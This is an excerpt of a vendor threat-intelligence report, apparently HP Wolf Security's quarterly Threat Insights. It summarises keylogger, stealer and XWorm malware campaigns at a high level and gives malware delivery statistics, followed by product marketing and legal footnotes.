In Q3, the HP Threat Research team uncovered large malware campaigns spreading VIP Keylogger, caught by HP Sure Click. The threat actors behind this campaign sent emails posing as invoices and...
Much of the code in the script belongs to a legitimate XML parsing library. This code obfuscates the malware and does not execute. The malicious code decodes and runs a PowerShell script (T105...
0bj3ctivityStealer campaign highlights how malware kits are boosting attack efficiency
Q3 saw another campaign, caught by HP Sure Click, that shared many similarities with the VIP Keylogger activity. Threat actors began by sending malicious archive files to targets by email, pos...
Though both campaigns distribute different malware families, they share many similarities, including: • Hiding malicious code within legitimate script...
HTML smuggling threat delivering XWorm bears hallmarks of GenAI
One of the techniques we see threat actors using to infect PCs is HTML smuggling (T1027.006).⁶ The aim is to deliver malicious content hidden within HTML files, tricking victims into infe...
In addition to the HTML smuggling campaign that leads to XWorm, in Q3 we observed another campaign that makes use of the same malware dropper. In this case, however, the infection started with...
The campaign not only combines multiple different attack techniques to stay undetected during delivery and execution, but also shows a rise of AI-assisted malware development. Currently, we ar...
Threat actors target video game modification and cheat code repositories with Lumma Stealer
All the campaigns we’ve highlighted so far this quarter make use of email as their delivery method. The following campaign was an exception. In Q3, we spotted threat actors setting up a series...
In Q3, executables and scripts regained first place as the most popular malware delivery type (40% of threats caught by HP Sure Click), seeing a 5%-point rise over Q2. In Q3, the top five archive file formats abused by threat actors were ZIP, RAR, LZH, 7Z and GZ. Archives were the second most popular malware delivery file type (34% of threats). 8% of threats relied on documents such as Microsoft Word formats (e.g. DOC, DOCX), while malicious spreadsheets (e.g. XLS, XLSX) totaled 7% of threats. 9% of threats were PDF files, seeing a 2%-point rise over Q2. The remaining 2% of threats used other application types.
Email remained the top vector for delivering malware to endpoints (52% of threats), falling 9% points compared to Q2. Malicious web browser downloads grew by 10% points to 28% in Q3. Threats d...
The HP Wolf Security Threat Insights Report is made possible by most of our customers who opt to share threat telemetry with HP. Our security experts analyze threat trends and significant malw...
Enterprises are most vulnerable from users opening email attachments, clicking on hyperlinks in emails, and downloading files from the web. HP Wolf Security protects the enterprise by isolatin...
HP Wolf Security is a new breedᶜ of endpoint security. HP’s portfolio of hardware-enforced security and endpointfocused security services are designed to help organizations safeguard PCs,...
a. HP Wolf Enterprise Security is an optional service and may include offerings such as HP Sure Click Enterprise and HP Sure Access Enterprise. HP Sure Click Enterprise requires Windows 8 or 10 and Microsoft Internet Explorer, Google Chrome, Chromium or Firefox are supported. Supported attachments include Microsoft Office (Word, Excel, PowerPoint) and PDF files, when Microsoft Office or Adobe Acrobat are installed. HP Sure Access Enterprise requires Windows 10 Pro or Enterprise. HP services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time of purchase. Customer may have additional statutory rights according to applicable local laws, and such rights are not in any way affected by the HP terms and conditions of service or the HP Limited Warranty provided with your HP Product. For full system requirements, please visit www.hpdaas.com/requirements.b. HP Wolf Security Controller requires HP Sure Click Enterprise or HP Sure Access Enterprise. HP Wolf Security Controller is a management and analytics platform that provides critical data around devices and applications and is not sold as a standalone service. HP Wolf Security Controller follows stringent GDPR privacy regulations and is ISO27001, ISO27017 and SOC2 Type 2 certified for Information Security. Internet access with connection to the HP Cloud is required. For full system requirements, please visit http://www.hpdaas.com/requirements.c. HP Security is now HP Wolf Security. Security features vary by platform, please see product data sheet for details. HP Services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time HP Services are governed by the applicable HP terms and conditions of service provided or indicated to Customer at the time of purchase. Customer may have additional statutory rights according to applicable local laws, and such rights are not in any way affected by the HP terms and conditions of service or the HP Limited Warranty provided with your HP Product.
